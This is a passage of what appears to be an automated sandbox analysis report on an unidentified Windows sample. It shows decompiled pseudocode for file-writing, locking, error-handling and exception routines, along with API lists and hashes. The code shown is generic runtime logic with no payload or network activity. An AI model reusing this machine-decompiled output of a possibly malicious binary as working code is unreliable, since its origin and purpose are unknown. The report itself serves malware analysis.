                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Pointer$SizeWrite_memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 306586478-0
                                                                                                                                                                                          • Opcode ID: d90f16199c250328b696e46c3f7d2f24fe05f5103ffb2f7efb6578d565673b0b
                                                                                                                                                                                          • Instruction ID: 58af729005ffee5aac5646ac38169ee0d1475973d44d573e796b748843e2a0d3
                                                                                                                                                                                          • Opcode Fuzzy Hash: d90f16199c250328b696e46c3f7d2f24fe05f5103ffb2f7efb6578d565673b0b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F213D737403023BD324AA69EC45F6B779CEBC0B25F15052DF549D3281EA61E90483B5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C88080 Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C87FE0: GetLastError.KERNEL32(?,00000000,00000000,00C8816A,00000000,00000000,00D47270,00000000,00000000,00C84DB5,00000000,00000000,00D47270,?,00000000), ref: 00C87FE3
                                                                                                                                                                                            • Part of subcall function 00C87FE0: SetLastError.KERNEL32(00000000,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C87FF0
                                                                                                                                                                                            • Part of subcall function 00C87FE0: SetLastError.KERNEL32(?,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C88016
                                                                                                                                                                                            • Part of subcall function 00C87FE0: SetLastError.KERNEL32(?,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C88057
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00C880AC
                                                                                                                                                                                            • Part of subcall function 00D00729: RaiseException.KERNEL32(?,?,?,00C880B1,?,?,?,?,?,00C880B1,00D59760,00D59760), ref: 00D0076B
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00C880E4
                                                                                                                                                                                          • SetLastError.KERNEL32(00000008,8A9E1774,?,?,00000001,?,00D68DCC,?,00C89DC7), ref: 00C8811D
                                                                                                                                                                                            • Part of subcall function 00C88080: __CxxThrowException@8.LIBCMT ref: 00C8814A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$Exception@8Throw$ExceptionRaise
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2285286292-0
                                                                                                                                                                                          • Opcode ID: cb6ae1b3c08969fba3839800b7d9edd81910008d6b43626c3ebd2255b54d7929
                                                                                                                                                                                          • Instruction ID: 97bd187505fa8530741756019fece7373d0a4e055928c2bf7cf6c6484744657c
                                                                                                                                                                                          • Opcode Fuzzy Hash: cb6ae1b3c08969fba3839800b7d9edd81910008d6b43626c3ebd2255b54d7929
                                                                                                                                                                                          • Instruction Fuzzy Hash: FF213DB1518305BFD704EFA5DC45F6BB7ECEB88704F10891DB65892281EB74E9088B72
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C853C0 Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E00C853C0(void** __eax, intOrPtr __ecx) {
				intOrPtr _v4;
				void _v8;
				void _v12;
				long _v16;
				int _t19;
				int _t26;
				int _t28;
				int _t30;
				void** _t40;
				void* _t42;

				_t40 = __eax;
				_t42 =  *__eax;
				_v4 = __ecx;
				_push(0);
				_v8 = __eax[4];
				if(SetFilePointerEx(_t42, __eax[2], 0, 0) != 0) {
					_t19 = WriteFile(_t42,  &_v8, 8,  &_v16, 0);
					__eflags = _t19;
					if(_t19 == 0) {
						goto L1;
					} else {
						__eflags = _v16 - 8;
						if(__eflags != 0) {
							L8:
							E00C88420(1, 0xd47270);
							goto L9;
						} else {
							_t26 = E00C86240(_t40,  &_v16, __eflags,  &_v12);
							__eflags = _t26;
							if(_t26 == 0) {
								L9:
								__eflags = 0;
								return 0;
							} else {
								_push(0);
								_t28 = SetFilePointerEx(_t42,  *(_t40 + 4), 0, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									goto L1;
								} else {
									_t30 = WriteFile(_t42,  &_v12, 4,  &_v16, 0);
									__eflags = _t30;
									if(_t30 == 0) {
										goto L1;
									} else {
										__eflags = _v16 - 4;
										if(_v16 == 4) {
											return 1;
										} else {
											goto L8;
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					_push(0xd47270);
					_push(0);
					_push(0);
					E00C88150(0xd47270);
					return 0;
				}
			}













                                                                                                                                                                                          0x00c853cd
                                                                                                                                                                                          0x00c853d2
                                                                                                                                                                                          0x00c853d4
                                                                                                                                                                                          0x00c853da
                                                                                                                                                                                          0x00c853dc
                                                                                                                                                                                          0x00c853ea
                                                                                                                                                                                          0x00c85421
                                                                                                                                                                                          0x00c85423
                                                                                                                                                                                          0x00c85425
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85427
                                                                                                                                                                                          0x00c85427
                                                                                                                                                                                          0x00c8542c
                                                                                                                                                                                          0x00c85471
                                                                                                                                                                                          0x00c8547b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8542e
                                                                                                                                                                                          0x00c85439
                                                                                                                                                                                          0x00c85441
                                                                                                                                                                                          0x00c85443
                                                                                                                                                                                          0x00c85486
                                                                                                                                                                                          0x00c85486
                                                                                                                                                                                          0x00c8548c
                                                                                                                                                                                          0x00c85445
                                                                                                                                                                                          0x00c8544a
                                                                                                                                                                                          0x00c8544f
                                                                                                                                                                                          0x00c85451
                                                                                                                                                                                          0x00c85453
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85455
                                                                                                                                                                                          0x00c85464
                                                                                                                                                                                          0x00c85466
                                                                                                                                                                                          0x00c85468
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8546a
                                                                                                                                                                                          0x00c8546a
                                                                                                                                                                                          0x00c8546f
                                                                                                                                                                                          0x00c85499
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8546f
                                                                                                                                                                                          0x00c85468
                                                                                                                                                                                          0x00c85453
                                                                                                                                                                                          0x00c85443
                                                                                                                                                                                          0x00c8542c
                                                                                                                                                                                          0x00c853ec
                                                                                                                                                                                          0x00c853ec
                                                                                                                                                                                          0x00c853ec
                                                                                                                                                                                          0x00c853f1
                                                                                                                                                                                          0x00c853f3
                                                                                                                                                                                          0x00c853fa
                                                                                                                                                                                          0x00c8540b
                                                                                                                                                                                          0x00c8540b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000000), ref: 00C853E6
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000008,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C85421
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000000), ref: 00C8544F
                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000004,00000004,?,00000000,?,?,00000000,00000000,00000000), ref: 00C85464
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$PointerWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 539440098-0
                                                                                                                                                                                          • Opcode ID: 11d3fdb26d716cc10abfa127706a061e08e96ad2f261c6536fa5657f049b0ce5
                                                                                                                                                                                          • Instruction ID: df8152d24c454460f245def47fda60b17e6992f20b3e1c1aea394b060f7e8898
                                                                                                                                                                                          • Opcode Fuzzy Hash: 11d3fdb26d716cc10abfa127706a061e08e96ad2f261c6536fa5657f049b0ce5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5221B272304701AFE710EA58AC41F7BB3DCEB84754F440829FA14C2241E7A5EA0987BA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8EED0 Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                          			E00C8EED0(void* __ebx) {
				intOrPtr _v4;
				char _v12;
				struct _CRITICAL_SECTION* _v16;
				void* __edi;
				signed int _t18;
				struct _CRITICAL_SECTION* _t21;
				struct _CRITICAL_SECTION* _t23;
				intOrPtr* _t25;
				struct _CRITICAL_SECTION* _t26;
				signed int _t29;
				void* _t30;
				intOrPtr* _t35;
				signed int* _t40;
				intOrPtr _t41;
				void* _t42;
				signed int* _t46;
				struct _CRITICAL_SECTION* _t50;
				void* _t51;
				void* _t54;
				signed int _t55;

				_t30 = __ebx;
				_push(0xffffffff);
				_push(0xd39198);
				_push( *[fs:0x0]);
				_t18 =  *0xd64070; // 0x8a9e1774
				_push(_t18 ^ _t55);
				 *[fs:0x0] =  &_v12;
				_t21 =  *((intOrPtr*)(__ebx + 0x40));
				if(_t21 != 0) {
					L21:
					 *[fs:0x0] = _v12;
					return 1;
				} else {
					_t50 = __ebx + 0x28;
					_v16 = _t21;
					if(_t50 != 0) {
						EnterCriticalSection(_t50);
						_v16 = _t50;
					}
					_v4 = 0;
					_t34 =  *((intOrPtr*)(_t30 + 0x40));
					if( *((intOrPtr*)(_t30 + 0x40)) != 0) {
						L19:
						_t23 = _v16;
						if(_t23 != 0) {
							LeaveCriticalSection(_t23);
						}
						goto L21;
					} else {
						_t46 = _t30 + 0x44;
						E00D006A0(_t46, _t46, _t34, 0x64);
						_t55 = _t55 + 0xc;
						_t25 = E00C90A50();
						if(_t25 != 0) {
							_t35 = _t25;
							_t11 = _t35 + 2; // 0x2
							_t51 = _t11;
							do {
								_t41 =  *_t35;
								_t35 = _t35 + 2;
							} while (_t41 != 0);
							if(_t35 - _t51 >> 1 >= 0x32) {
								goto L5;
							} else {
								_t42 = 0x32;
								_t40 = _t46;
								_t54 = _t25 - _t46;
								while(1) {
									_t12 = _t42 + 0x7fffffcc; // 0x7ffffffe
									if(_t12 == 0) {
										break;
									}
									_t29 =  *(_t54 + _t40) & 0x0000ffff;
									if(_t29 == 0) {
										break;
									} else {
										 *_t40 = _t29;
										_t40 =  &(_t40[0]);
										_t42 = _t42 - 1;
										if(_t42 != 0) {
											continue;
										} else {
											L17:
											_t40 = _t40 - 2;
										}
									}
									L18:
									 *_t40 = 0;
									 *((intOrPtr*)(_t30 + 0x40)) = 1;
									goto L19;
								}
								if(_t42 == 0) {
									goto L17;
								}
								goto L18;
							}
						} else {
							L5:
							_t26 = _v16;
							if(_t26 != 0) {
								LeaveCriticalSection(_t26);
							}
							 *[fs:0x0] = _v12;
							return 0;
						}
					}
				}
			}























                                                                                                                                                                                          0x00c8eed0
                                                                                                                                                                                          0x00c8eed0
                                                                                                                                                                                          0x00c8eed2
                                                                                                                                                                                          0x00c8eedd
                                                                                                                                                                                          0x00c8eee1
                                                                                                                                                                                          0x00c8eee8
                                                                                                                                                                                          0x00c8eeed
                                                                                                                                                                                          0x00c8eef3
                                                                                                                                                                                          0x00c8eef8
                                                                                                                                                                                          0x00c8efc8
                                                                                                                                                                                          0x00c8efd1
                                                                                                                                                                                          0x00c8efde
                                                                                                                                                                                          0x00c8eefe
                                                                                                                                                                                          0x00c8eefe
                                                                                                                                                                                          0x00c8ef01
                                                                                                                                                                                          0x00c8ef07
                                                                                                                                                                                          0x00c8ef0a
                                                                                                                                                                                          0x00c8ef10
                                                                                                                                                                                          0x00c8ef10
                                                                                                                                                                                          0x00c8ef14
                                                                                                                                                                                          0x00c8ef1c
                                                                                                                                                                                          0x00c8ef21
                                                                                                                                                                                          0x00c8efb9
                                                                                                                                                                                          0x00c8efb9
                                                                                                                                                                                          0x00c8efbf
                                                                                                                                                                                          0x00c8efc2
                                                                                                                                                                                          0x00c8efc2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8ef27
                                                                                                                                                                                          0x00c8ef2a
                                                                                                                                                                                          0x00c8ef2e
                                                                                                                                                                                          0x00c8ef33
                                                                                                                                                                                          0x00c8ef36
                                                                                                                                                                                          0x00c8ef3d
                                                                                                                                                                                          0x00c8ef62
                                                                                                                                                                                          0x00c8ef64
                                                                                                                                                                                          0x00c8ef64
                                                                                                                                                                                          0x00c8ef67
                                                                                                                                                                                          0x00c8ef67
                                                                                                                                                                                          0x00c8ef6a
                                                                                                                                                                                          0x00c8ef6d
                                                                                                                                                                                          0x00c8ef79
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8ef7b
                                                                                                                                                                                          0x00c8ef7d
                                                                                                                                                                                          0x00c8ef82
                                                                                                                                                                                          0x00c8ef84
                                                                                                                                                                                          0x00c8ef86
                                                                                                                                                                                          0x00c8ef86
                                                                                                                                                                                          0x00c8ef8e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8ef90
                                                                                                                                                                                          0x00c8ef97
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8ef99
                                                                                                                                                                                          0x00c8ef99
                                                                                                                                                                                          0x00c8ef9c
                                                                                                                                                                                          0x00c8ef9f
                                                                                                                                                                                          0x00c8efa2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8efa4
                                                                                                                                                                                          0x00c8efaa
                                                                                                                                                                                          0x00c8efaa
                                                                                                                                                                                          0x00c8efaa
                                                                                                                                                                                          0x00c8efa2
                                                                                                                                                                                          0x00c8efad
                                                                                                                                                                                          0x00c8efaf
                                                                                                                                                                                          0x00c8efb2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8efb2
                                                                                                                                                                                          0x00c8efa8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8efa8
                                                                                                                                                                                          0x00c8ef3f
                                                                                                                                                                                          0x00c8ef3f
                                                                                                                                                                                          0x00c8ef3f
                                                                                                                                                                                          0x00c8ef45
                                                                                                                                                                                          0x00c8ef48
                                                                                                                                                                                          0x00c8ef48
                                                                                                                                                                                          0x00c8ef54
                                                                                                                                                                                          0x00c8ef61
                                                                                                                                                                                          0x00c8ef61
                                                                                                                                                                                          0x00c8ef3d
                                                                                                                                                                                          0x00c8ef21

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,8A9E1774,?,?,?,?,00D39198,000000FF,00C8EE8E), ref: 00C8EF0A
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C8EF2E
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00C8EF48
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,8A9E1774,?,?,?,?,00D39198,000000FF,00C8EE8E), ref: 00C8EFC2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter_memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4193498983-0
                                                                                                                                                                                          • Opcode ID: 38eac2bffbc74a41ee8f386ebdcef042b03852a346dc6ecccebf5cede9b3e52e
                                                                                                                                                                                          • Instruction ID: 2647074bdc3e59099be7afbd7aaf40d796b2a370d3639083c7e6d4f7b30739ff
                                                                                                                                                                                          • Opcode Fuzzy Hash: 38eac2bffbc74a41ee8f386ebdcef042b03852a346dc6ecccebf5cede9b3e52e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E31FF716043218BEB24EF68C84476A77E4FF84718F01492DEA62CB380E736DA04CBA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8D210 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 57%
                                                                                                                                                                                          			E00C8D210(void* __ebx, void* __edi, void* __ebp, signed int _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				signed int _t23;
				signed int _t24;
				signed int _t29;
				signed int _t30;
				void* _t39;
				signed int _t40;
				signed int _t43;
				intOrPtr* _t45;
				signed int _t47;
				void* _t50;
				intOrPtr* _t52;

				_t50 = __edi;
				_t39 = __ebx;
				_t40 = _a4;
				if(_t40 > 0) {
					_t24 = _t23 | 0xffffffff;
					_t47 = _t24 % _t40;
					__eflags = _t24 / _t40 - 4;
					if(__eflags >= 0) {
						goto L2;
					} else {
						_a4 = 0;
						E00D06117( &_v12,  &_a4);
						_v16 = 0xd3e0a0;
						_t29 = E00D00729( &_v16, 0xd59840);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t43 = _v20;
						__eflags = _t43;
						if(_t43 > 0) {
							_t30 = _t29 | 0xffffffff;
							_t47 = _t30 % _t43;
							__eflags = _t30 / _t43 - 1;
							if(__eflags >= 0) {
								goto L6;
							} else {
								_v8 = 0;
								E00D06117( &_v24,  &_v8);
								_t45 =  &_v28;
								_v28 = 0xd3e0a0;
								E00D00729(_t45, 0xd59840);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_t52 = _t45;
								E00D06187(_t45, _v20);
								 *_t52 = 0xd3e0a0;
								return _t52;
							}
						} else {
							_t43 = 0;
							__eflags = 0;
							L6:
							return E00D0167F(_t39, _t47, _t50, __eflags, _t43);
						}
					}
				} else {
					_t40 = 0;
					L2:
					return E00D0167F(_t39, _t40 * 4, _t50, 0, _t40 * 4);
				}
			}




















                                                                                                                                                                                          0x00c8d210
                                                                                                                                                                                          0x00c8d210
                                                                                                                                                                                          0x00c8d210
                                                                                                                                                                                          0x00c8d219
                                                                                                                                                                                          0x00c8d231
                                                                                                                                                                                          0x00c8d236
                                                                                                                                                                                          0x00c8d238
                                                                                                                                                                                          0x00c8d23b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8d23d
                                                                                                                                                                                          0x00c8d246
                                                                                                                                                                                          0x00c8d24e
                                                                                                                                                                                          0x00c8d25d
                                                                                                                                                                                          0x00c8d265
                                                                                                                                                                                          0x00c8d26a
                                                                                                                                                                                          0x00c8d26b
                                                                                                                                                                                          0x00c8d26c
                                                                                                                                                                                          0x00c8d26d
                                                                                                                                                                                          0x00c8d26e
                                                                                                                                                                                          0x00c8d26f
                                                                                                                                                                                          0x00c8d270
                                                                                                                                                                                          0x00c8d277
                                                                                                                                                                                          0x00c8d279
                                                                                                                                                                                          0x00c8d28a
                                                                                                                                                                                          0x00c8d28f
                                                                                                                                                                                          0x00c8d291
                                                                                                                                                                                          0x00c8d294
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8d296
                                                                                                                                                                                          0x00c8d29f
                                                                                                                                                                                          0x00c8d2a7
                                                                                                                                                                                          0x00c8d2b1
                                                                                                                                                                                          0x00c8d2b6
                                                                                                                                                                                          0x00c8d2be
                                                                                                                                                                                          0x00c8d2c3
                                                                                                                                                                                          0x00c8d2c4
                                                                                                                                                                                          0x00c8d2c5
                                                                                                                                                                                          0x00c8d2c6
                                                                                                                                                                                          0x00c8d2c7
                                                                                                                                                                                          0x00c8d2c8
                                                                                                                                                                                          0x00c8d2c9
                                                                                                                                                                                          0x00c8d2ca
                                                                                                                                                                                          0x00c8d2cb
                                                                                                                                                                                          0x00c8d2cc
                                                                                                                                                                                          0x00c8d2cd
                                                                                                                                                                                          0x00c8d2ce
                                                                                                                                                                                          0x00c8d2cf
                                                                                                                                                                                          0x00c8d2d6
                                                                                                                                                                                          0x00c8d2d8
                                                                                                                                                                                          0x00c8d2dd
                                                                                                                                                                                          0x00c8d2e6
                                                                                                                                                                                          0x00c8d2e6
                                                                                                                                                                                          0x00c8d27b
                                                                                                                                                                                          0x00c8d27b
                                                                                                                                                                                          0x00c8d27b
                                                                                                                                                                                          0x00c8d27d
                                                                                                                                                                                          0x00c8d289
                                                                                                                                                                                          0x00c8d289
                                                                                                                                                                                          0x00c8d279
                                                                                                                                                                                          0x00c8d21b
                                                                                                                                                                                          0x00c8d21b
                                                                                                                                                                                          0x00c8d21d
                                                                                                                                                                                          0x00c8d230
                                                                                                                                                                                          0x00c8d230

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::exception::exception.LIBCMT ref: 00C8D24E
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00C8D265
                                                                                                                                                                                            • Part of subcall function 00D0167F: _malloc.LIBCMT ref: 00D01699
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4063778783-0
                                                                                                                                                                                          • Opcode ID: 34674500a1c1475d62040bb5083246e9a97cea4297ce2c42d15487b0d522d607
                                                                                                                                                                                          • Instruction ID: f118955326b255cd9792befb6b78cc17a968ea062cfda9738a351a38548b93f6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 34674500a1c1475d62040bb5083246e9a97cea4297ce2c42d15487b0d522d607
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3101E1B14143006AE30CEF20D956B2F77A5AB90700F544E2DF85A811C1EB70EA1CCA77
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C87E50 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                          			E00C87E50(intOrPtr* _a4) {
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t18;
				intOrPtr _t21;
				char* _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				long _t26;
				void* _t27;
				void* _t28;
				void* _t30;

				_t8 = GetLastError();
				_t9 = E00D05D61(_t30);
				_t27 = E00C89BB0();
				 *((intOrPtr*)(E00D05D61(_t30))) =  *_t9;
				SetLastError(_t8);
				if(_t27 == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t28 = _t27 + 8;
					_t32 = _t28;
					if(_t28 == 0) {
						L14:
						return _t28;
					} else {
						_t26 = GetLastError();
						_t21 =  *((intOrPtr*)(E00D05D61(_t32)));
